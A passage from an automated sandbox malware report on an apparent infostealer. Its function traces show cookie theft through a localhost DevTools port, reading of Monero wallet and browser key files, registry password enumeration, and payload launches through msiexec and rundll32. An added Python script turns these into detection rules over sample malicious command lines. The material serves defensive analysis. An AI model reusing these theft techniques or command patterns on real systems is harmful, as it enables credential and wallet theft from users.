                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: db97b30517017b7087abc4732b710abc2b756ba8814852df21f3cad4ca781e24
                          • Instruction ID: d236b74ca0e041ff4a4fa5c25bdd03dea07b38093f4ec5a2a60b1f53ae69b051
                          • Opcode Fuzzy Hash: db97b30517017b7087abc4732b710abc2b756ba8814852df21f3cad4ca781e24
                          • Instruction Fuzzy Hash: 1712FF71A101189ACB16EBA0DDA2FEEB73DAF15300F0045A9F54676193EF346B49CF62
                          APIs
                            • Part of subcall function 00029A50: InternetOpenA.WININET(00040AF6,00000001,00000000,00000000,00000000), ref: 00029A6A
                          • lstrcat.KERNEL32(?,cookies), ref: 00029CAF
                          • lstrcat.KERNEL32(?,000412C4), ref: 00029CC1
                          • lstrcat.KERNEL32(?,?), ref: 00029CD5
                          • lstrcat.KERNEL32(?,000412C8), ref: 00029CE7
                          • lstrcat.KERNEL32(?,?), ref: 00029CFB
                          • lstrcat.KERNEL32(?,.txt), ref: 00029D0D
                          • lstrlen.KERNEL32(00000000), ref: 00029D17
                          • lstrlen.KERNEL32(00000000), ref: 00029D26
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 3174675846-3542011879
                          • Opcode ID: ca5aaaf8791ef96a0b9ba00b1d34ac87bca1f84bd2c49a7fc8a0b7c80eba16c1
                          • Instruction ID: 8b1a63e8070e5ba17c446914b2e02966077022f363c507f642ce08a6de5ff933
                          • Opcode Fuzzy Hash: ca5aaaf8791ef96a0b9ba00b1d34ac87bca1f84bd2c49a7fc8a0b7c80eba16c1
                          • Instruction Fuzzy Hash: B45151B2D10518ABDB14EBE0EC95FEE7738AF14301F408568F609A7091EF74AA59CF61
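Two functions above give defenders concrete execution and network artifacts. The ShellExecuteEx function builds either C:\Windows\system32\msiexec.exe /i "<payload>" /passive or C:\Windows\system32\rundll32.exe <payload>.dll, depending on the extension of what it was told to run, and the cookie function combines "ws://localhost:9229", "/devtools", "cookies" and ".txt", i.e. it reads browser cookies through a DevTools endpoint on port 9229 and writes them to a text file. The Python below is an added set of detection heuristics covering both functions, not part of the report or of any product, run over constructed process-creation and network-connection records whose field names are an assumption (shaped after Sysmon event IDs 1 and 3). Two further assumptions are marked in the code: that the dropped payload lives in a user-writable directory (the report shows the command line but not the path), and that a browser had to be started with --remote-debugging-port for the websocket to exist, which is general DevTools behaviour rather than something the report shows.

```python
"""Heuristics for the payload execution and DevTools cookie access in this report.

Added example, not part of the report or of any product. Grounded in the
report: the sample runs C:\\Windows\\system32\\msiexec.exe /i "<payload>" /passive
and C:\\Windows\\system32\\rundll32.exe <payload>.dll via ShellExecuteEx, and its
cookie function carries ws://localhost:9229 and /devtools. Assumptions: the
event field names (after Sysmon event IDs 1 and 3), that the payload sits in a
user-writable directory, and the browser-launch rule (a DevTools websocket only
exists when the browser was started with --remote-debugging-port, which the
report itself does not show).
"""
import re
from typing import Dict, List, Tuple

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
INSTALL_PARENTS = {"explorer.exe", "services.exe", "msiexec.exe", "svchost.exe"}
USER_WRITABLE = re.compile(r"^[a-z]:\\(?:users|programdata|windows\\temp)\\", re.I)


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: Dict) -> List[str]:
    image, parent = _base(ev["image"]), _base(ev.get("parent_image", ""))
    cmd = ev.get("cmdline", "")
    hits = []
    # msiexec /i "<file>" /passive started by something other than a normal installer parent
    if (image == "msiexec.exe" and re.search(r"\s/i\s", cmd, re.I)
            and re.search(r"\s/passive\b", cmd, re.I) and parent not in INSTALL_PARENTS):
        hits.append("msiexec-passive-install-from-unusual-parent")
    # rundll32 loading a DLL from a user-writable location (payload location is an assumption)
    if image == "rundll32.exe":
        m = re.search(r'"?([^"\s]+\.dll)', cmd, re.I)
        if m and USER_WRITABLE.match(m.group(1)):
            hits.append("rundll32-dll-from-user-writable-path")
    # browser started with a DevTools listener (assumed precondition for ws://localhost:9229)
    if image in BROWSERS and re.search(r"--remote-debugging-port=\d+", cmd, re.I):
        hits.append("browser-remote-debugging-enabled")
    return hits


def check_network(ev: Dict) -> List[str]:
    loopback = ev.get("dest_ip") in ("127.0.0.1", "::1")
    if loopback and ev.get("dest_port") == 9229 and _base(ev["image"]) not in BROWSERS:
        return ["devtools-port-9229-from-non-browser"]
    return []


def evaluate(events: List[Dict]) -> List[Tuple[int, str]]:
    alerts: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        rules = check_process(ev) if ev["type"] == "process" else check_network(ev)
        alerts.extend((i, r) for r in rules)
    return alerts


STEALER = r"C:\Users\victim\Downloads\file.exe"
EVENTS = [  # constructed records, not taken from the report
    {"type": "process", "image": STEALER, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": STEALER},
    {"type": "process", "image": r"C:\Windows\system32\msiexec.exe", "parent_image": STEALER,
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\AppData\Local\Temp\upd.msi" /passive'},
    {"type": "process", "image": r"C:\Windows\system32\rundll32.exe", "parent_image": STEALER,
     "cmdline": r"C:\Windows\system32\rundll32.exe C:\Users\victim\AppData\Local\Temp\mod.dll"},
    {"type": "process", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": STEALER,
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --headless'},
    {"type": "network", "image": STEALER, "dest_ip": "127.0.0.1", "dest_port": 9229},
    {"type": "process", "image": r"C:\Windows\system32\msiexec.exe",  # user-driven install: no alert
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\Downloads\tool.msi"'},
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_ip": "127.0.0.1", "dest_port": 9229},  # the browser's own DevTools traffic: no alert
]

if __name__ == "__main__":
    for idx, rule in evaluate(EVENTS):
        print(f"event {idx}: {rule}")
```

The loopback rule is the one most directly tied to the strings in the report; it only fires if the sensor records localhost TCP connections, which not every configuration does, so the process-creation rules are the fallback. None of the rules name the sample or its hash, so they also cover other loaders that reuse the same msiexec and DevTools patterns.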
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 000262D0: InternetOpenA.WININET(00040DFF,00000001,00000000,00000000,00000000), ref: 00026331
                            • Part of subcall function 000262D0: StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00026353
                            • Part of subcall function 000262D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026385
                            • Part of subcall function 000262D0: HttpOpenRequestA.WININET(00000000,GET,?,00FDE068,00000000,00000000,00400100,00000000), ref: 000263D5
                            • Part of subcall function 000262D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0002640F
                            • Part of subcall function 000262D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026421
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00035568
                          • lstrlen.KERNEL32(00000000), ref: 0003557F
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 000355B4
                          • lstrlen.KERNEL32(00000000), ref: 000355D3
                          • lstrlen.KERNEL32(00000000), ref: 000355FE
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 59d274212e211e4c1a7e2d03d42419bf3348d274f8f17d0de2d50d86ed28bafd
                          • Instruction ID: 383d3d42c2cb6000d6a69a3a7b0a83c1b0d3531f89499e4bf9754b1c4a1af9a7
                          • Opcode Fuzzy Hash: 59d274212e211e4c1a7e2d03d42419bf3348d274f8f17d0de2d50d86ed28bafd
                          • Instruction Fuzzy Hash: BA51D770A10108EBCB15FF60DDA6AED777DAF12341F504468E54A6B5A3EB306B48CB62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: b58a2b178db88524a3071527b73e7210a5c02bbb39730e71dcab12c7f25329b5
                          • Instruction ID: f43c58cecc4156e819baa2d7543d235ad609f8a2d0975f05adb2d9fa7273790e
                          • Opcode Fuzzy Hash: b58a2b178db88524a3071527b73e7210a5c02bbb39730e71dcab12c7f25329b5
                          • Instruction Fuzzy Hash: D6C141B5A002199BCB15EF60EC99FEE737DAF58304F0045D9F50AA7242DB70AA85CF91
                          APIs
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                          • lstrcat.KERNEL32(?,00000000), ref: 0003453C
                          • lstrcat.KERNEL32(?,00FDE470), ref: 0003455B
                          • lstrcat.KERNEL32(?,?), ref: 0003456F
                          • lstrcat.KERNEL32(?,00FDCE88), ref: 00034583
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 00038F20: GetFileAttributesA.KERNEL32(00000000,?,00021B94,?,?,0004577C,?,?,00040E22), ref: 00038F2F
                            • Part of subcall function 0002A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0002A489
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                            • Part of subcall function 00039550: GlobalAlloc.KERNEL32(00000000,0003462D,0003462D), ref: 00039563
                          • StrStrA.SHLWAPI(?,00FDE5C0), ref: 00034643
                          • GlobalFree.KERNEL32(?), ref: 00034762
                            • Part of subcall function 0002A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A23F
                            • Part of subcall function 0002A210: LocalAlloc.KERNEL32(00000040,?,?,?,00024F3E,00000000,?), ref: 0002A251
                            • Part of subcall function 0002A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A27A
                            • Part of subcall function 0002A210: LocalFree.KERNEL32(?,?,?,?,00024F3E,00000000,?), ref: 0002A28F
                          • lstrcat.KERNEL32(?,00000000), ref: 000346F3
                          • StrCmpCA.SHLWAPI(?,000408D2), ref: 00034710
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00034722
                          • lstrcat.KERNEL32(00000000,?), ref: 00034735
                          • lstrcat.KERNEL32(00000000,00040FA0), ref: 00034744
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 2d01669de315669ad33e70bda4ec08994dd83356f6eab3998e1e201e4b1c5bbf
                          • Instruction ID: 38afb34c7c19ae7ce0d5ec085f4c859f12efb639f4302145922d27b7935e32dc
                          • Opcode Fuzzy Hash: 2d01669de315669ad33e70bda4ec08994dd83356f6eab3998e1e201e4b1c5bbf
                          • Instruction Fuzzy Hash: 947168B6A00218ABDB15EBA0ED59FEE777DAF89300F004598F605A7142EB34EB54CF51
                          APIs
                            • Part of subcall function 000212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000212B4
                            • Part of subcall function 000212A0: RtlAllocateHeap.NTDLL(00000000), ref: 000212BB
                            • Part of subcall function 000212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000212D7
                            • Part of subcall function 000212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000212F5
                            • Part of subcall function 000212A0: RegCloseKey.ADVAPI32(?), ref: 000212FF
                          • lstrcat.KERNEL32(?,00000000), ref: 0002134F
                          • lstrlen.KERNEL32(?), ref: 0002135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00021377
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00021465
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                          • DeleteFileA.KERNEL32(00000000), ref: 000214EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 8e5ca1e2f02c6292b51d763a5763d991d3f01cf02b1b255c3ba8d54de4b53fc0
                          • Instruction ID: 2136ca250deb827303e6c361d7d6ea5bf92520bd89e68effc605b6b69d691a7a
                          • Opcode Fuzzy Hash: 8e5ca1e2f02c6292b51d763a5763d991d3f01cf02b1b255c3ba8d54de4b53fc0
                          • Instruction Fuzzy Hash: E35144B2E501189BCB15EB60DDA6FED733C9F55300F4045E8B64A66093EF306B89CB66
                          APIs
                          • InternetOpenA.WININET(00040AF6,00000001,00000000,00000000,00000000), ref: 00029A6A
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00029AAB
                          • InternetCloseHandle.WININET(00000000), ref: 00029AC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$Open$CloseHandle
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 3289985339-2144369209
                          • Opcode ID: 738a5b730a766c50467f4ae6f02093c2ad8639f32dd564c7d93a892fb594bcbe
                          • Instruction ID: 4dafff2b7597b878e1975bbca25e13268fd729295f5e544f241150e092633af4
                          • Opcode Fuzzy Hash: 738a5b730a766c50467f4ae6f02093c2ad8639f32dd564c7d93a892fb594bcbe
                          • Instruction Fuzzy Hash: FF414F75A10218EFCB14EF90ED95FED77B8BB48740F1041A5F609AB191CBB0AE84CB54
                          APIs
                            • Part of subcall function 00027330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0002739A
                            • Part of subcall function 00027330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00027411
                            • Part of subcall function 00027330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0002746D
                            • Part of subcall function 00027330: GetProcessHeap.KERNEL32(00000000,?), ref: 000274B2
                            • Part of subcall function 00027330: HeapFree.KERNEL32(00000000), ref: 000274B9
                          • lstrcat.KERNEL32(00000000,0004192C), ref: 00027666
                          • lstrcat.KERNEL32(00000000,00000000), ref: 000276A8
                          • lstrcat.KERNEL32(00000000, : ), ref: 000276BA
                          • lstrcat.KERNEL32(00000000,00000000), ref: 000276EF
                          • lstrcat.KERNEL32(00000000,00041934), ref: 00027700
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00027733
                          • lstrcat.KERNEL32(00000000,00041938), ref: 0002774D
                          • task.LIBCPMTD ref: 0002775B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: fe3c17951d505470add530842ecde0ad75f7fdc6127691146902a2dbb5f40e93
                          • Instruction ID: 643a17b670fabbe3e734398c18ed950d25da94d513ba61e674226bc20fae236e
                          • Opcode Fuzzy Hash: fe3c17951d505470add530842ecde0ad75f7fdc6127691146902a2dbb5f40e93
                          • Instruction Fuzzy Hash: 21318175904118EBDB08EBE0FC9ADFE7778AF48350B104128F506672A1CE34A996CF50
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00FDE1B8,00000000,?,00040E14,00000000,?,00000000), ref: 000382C0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000382C7
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 000382E8
                          • __aulldiv.LIBCMT ref: 00038302
                          • __aulldiv.LIBCMT ref: 00038310
                          • wsprintfA.USER32 ref: 0003833C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: cc2d18c33fadf79004cc564f9d9727d35b2bbd879f3e54960c4c19b95251c937
                          • Instruction ID: 59bc99e3ddf7ecf07760b55915210a049afe9d77a3adf21e5f74a6fe5cc2d497
                          • Opcode Fuzzy Hash: cc2d18c33fadf79004cc564f9d9727d35b2bbd879f3e54960c4c19b95251c937
                          • Instruction Fuzzy Hash: 9A21F4B1E44309ABDB10DFD4EC4AFAEBBB8EB44B14F104559F615BB280D77869008BA5
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00024800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                            • Part of subcall function 00024800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                          • InternetOpenA.WININET(00040DFB,00000001,00000000,00000000,00000000), ref: 0002615F
                          • StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00026197
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000261DF
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00026203
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0002622C
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0002625A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00026299
                          • InternetCloseHandle.WININET(?), ref: 000262A3
                          • InternetCloseHandle.WININET(00000000), ref: 000262B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: c94e1e12d891cde0401fc2fad61caab3d8867ea4d04810459a9117d1c67eb733
                          • Instruction ID: 8e5662e90efb007b2277d5a75c1f0d8b686dd335fe298a4e76c61eb0b1500caa
                          • Opcode Fuzzy Hash: c94e1e12d891cde0401fc2fad61caab3d8867ea4d04810459a9117d1c67eb733
                          • Instruction Fuzzy Hash: F95176B1A00218EBDF20DF90EC59FEEB779AB44301F1040A8F609A71C1DB756A89CF95
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 000A024D
                          • ___TypeMatch.LIBVCRUNTIME ref: 000A035B
                          • CatchIt.LIBVCRUNTIME ref: 000A03AC
                          • CallUnexpected.LIBVCRUNTIME ref: 000A04C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                           • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
